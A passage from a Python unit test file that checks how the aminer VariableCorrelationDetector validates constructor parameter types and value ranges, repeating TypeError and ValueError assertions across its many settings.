[self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, VariableCorrelationDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) 
self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 
[self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=set()) 
VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
num_steps_create_new_rules=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=-1) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase={"id": "Default"}) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=-1) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_end_learning_phase=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, 
self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, 
check_cor_prob_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_prob_thres=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=-1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, check_cor_num_thres=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=-1) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, min_values_cors_thres=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
new_vals_alarm_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, new_vals_alarm_thres=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=["Default"]) 
self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_bt=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) VariableCorrelationDetector(self.aminer_config, 
[self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="SomethingElse") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="Chi") VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_homogeneity_test="MaxDist") self.assertRaises(ValueError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_chisquare_test=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=1.1) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, max_dist_rule_distr=1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["SomethingElse"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=123.22) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=None) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["matchDiscDistr"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["excludeDueDistr"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["matchDiscVals"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, used_presel_meth=["random"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=b"True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth="True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 
intersect_presel_meth=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, intersect_presel_meth=True) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=1.1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors={"id": "Default"}) self.assertRaises(TypeError, 
VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.1) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, percentage_random_cors=0.99) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, match_disc_vals_sim_tresh=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, 